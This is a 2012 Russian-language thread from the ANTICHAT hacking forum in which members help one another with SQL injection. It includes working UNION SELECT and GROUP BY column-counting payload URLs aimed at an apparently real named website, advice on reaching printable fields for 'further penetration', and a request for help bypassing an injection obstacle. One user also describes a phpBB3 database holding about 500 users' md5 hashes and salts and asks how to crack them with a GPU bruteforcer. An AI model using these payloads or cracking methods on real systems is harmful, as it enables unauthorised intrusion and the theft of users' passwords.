ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
13.12.2012, 13:58
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от zloy_fantom
zloy_fantom said:
Кто-нибудь знает, чем можно открыть файлы .MYD.MYI.frm в удобном оконном интерфейсе? Как-то неохота через командную строку работать (не зная команд mysql)
Спасибо
Я бы на твоём месте скормил их Denwer и через phpmyadmin просмотрел нужные мне таблицы
|
|
|
13.12.2012, 14:24
|
|
Guest
Сообщений: n/a
Провел на форуме:
15180
Репутация:
0
|
|
Сообщение от BigBear
BigBear said:
Я бы на твоём месте скормил их Denwer и через phpmyadmin просмотрел нужные мне таблицы
Спасибо, а можно чуть подробнее: я качаю денвер, устанавливаю его, получив локалхост, загружаю в него полученные файлы БД...
А дальше?
phpmyadmin - это примочка денвера? Как ее запустить?
|
|
|
|
13.12.2012, 14:32
|
|
Guest
Сообщений: n/a
Провел на форуме:
15180
Репутация:
0
|
|
Сообщение от zloy_fantom
zloy_fantom said:
phpmyadmin - это примочка денвера? Как ее запустить?
Снимаю вопрос, нарыл инфу, то, что надо, спасибо, вечером поковыряю
|
|
|
|
13.12.2012, 21:00
|
|
Guest
Сообщений: n/a
Провел на форуме:
109228
Репутация:
124
|
|
Здравствуйте, решил приобщиться к SQLi(первый день) и назрел такой вот вопрос:
почему при зупросе http://bkp.bel-bkp.ru/site.php?id=165668-1%20union%20select%201%20-- ошибка, а при http://bkp.bel-bkp.ru/site.php?id=165668-1%20group%20by%201%20-- нормально все?
Вроде ж 0 столбцов быть не может, а если бы было больше 1, то group by выдало ошибку.
Заранее благодарен.
|
|
|
|
13.12.2012, 21:23
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от FunOfGun
FunOfGun said:
Здравствуйте, решил приобщиться к SQLi(первый день) и назрел такой вот вопрос:
почему при зупросе
http://bkp.bel-bkp.ru/site.php?id=165668-1%20union%20select%201%20--
ошибка, а при
http://bkp.bel-bkp.ru/site.php?id=165668-1%20group%20by%201%20--
нормально все?
Вроде ж 0 столбцов быть не может, а если бы было больше 1, то group by выдало ошибку.
Заранее благодарен.
1.Потому что с помощью group by мы подбираем количество колонок и он будт выводить тебе инфу до тех пор пока ты не превысишь этот лемит, т.е в твоем случае всего колоно 25
и свыше этого числа уже будет выводиться ошибка.
Сообщение от None
http://bkp.bel-bkp.ru/site.php?id=165668-1 group by 25 --
2. спомощью union select ты можешь вывести принтабельные поля, что облегчает нам дальнейшее проникновение,
Сообщение от None
http://bkp.bel-bkp.ru/site.php?id=165668-1 and 1=0 union select 1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20, 21,22,23,24,25 --
3. Изучите данные раздел, синтаксисы запросов, там все по полочкам расписано /thread43966.html
|
|
|
|
13.12.2012, 21:27
|
|
Guest
Сообщений: n/a
Провел на форуме:
109228
Репутация:
124
|
|
Сообщение от winstrool
winstrool said:
1.Потому что с помощью
group by
мы подбираем количество колонок и он будт выводить тебе инфу до тех пор пока ты не превысишь этот лемит, т.е в твоем случае всего колоно
25
и свыше этого числа уже будет выводиться ошибка.
2. спомощью
union select
ты можешь вывести принтабельные поля, что облегчает нам дальнейшее проникновение,
3. Изучите данные раздел, синтаксисы запросов, там все по полочкам расписано
/thread43966.html
Спасибо за ответ, именно по этому руководству и учился. Там оказывается в пункте, посвященном group by, в объяснении первого примера ошибка.
|
|
|
|
13.12.2012, 22:22
|
|
Участник форума
Регистрация: 07.01.2009
Сообщений: 237
Провел на форуме:
745649
Репутация:
97
|
|
Товарищи, прошу помощи с SQL injection.
Сервер отвечает так:
Сообщение от None
Invalid query
SELECT r.name FROM role as r INNER JOIN admin as a ON (a.role_id = r.role_id) WHERE a.nik='
' UNION (SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=`admin` LIMIT 0,1) --
'
1054: Unknown column 'admin' in 'where clause'
Цветом выделена моя инъекция.
Я так понимаю, он не может найти таблицу `admin` потому что мой запрос попал в INNER JOIN, верно?
Как можно обойти? |
|
|
|
13.12.2012, 22:39
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от herfleisch
herfleisch said:
Товарищи, прошу помощи с SQL injection.
Сервер отвечает так:
Цветом выделена моя инъекция.
Я так понимаю, он не может найти таблицу `admin` потому что мой запрос попал в INNER JOIN, верно?
Как можно обойти?
Засвети урл ошибки, посмотрим на живом примере!
|
|
|
|
14.12.2012, 03:07
|
|
Участник форума
Регистрация: 07.01.2009
Сообщений: 237
Провел на форуме:
745649
Репутация:
97
|
|
Сообщение от winstrool
winstrool said:
Засвети урл ошибки, посмотрим на живом примере!
Это локальный сервер. К сожалению, нет возможности скинуть линк, ибо он получится вида http://192.168.x.x/script.php
|
|
|
|
14.12.2012, 14:45
|
|
Guest
Сообщений: n/a
Провел на форуме:
15180
Репутация:
0
|
|
Сообщение от BigBear
BigBear said:
Я бы на твоём месте скормил их Denwer и через phpmyadmin просмотрел нужные мне таблицы
Получилось, вижу пользователей, хеши в md5(phpbb3) и соль, но подозреваю, что соль могла не применяться, можно как-то по хешам определить, посолены они, или нет? И еще вопрос: не нашел сетевых ресурсов расшифровки именно md5(phpbb3)-хешей, может у кого есть на примете? Локально пока остановился на Extreme GPU Bruteforcer, у меня печ560, вроде-бы это лучшее решение, он может сразу обрабатывать файл с паролями и файл с хешами. Как теперь извлечь столбец с хешами из БД в текстовый файл? Там около пятисот значений, так что вручную не осилю.
Спасибо
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
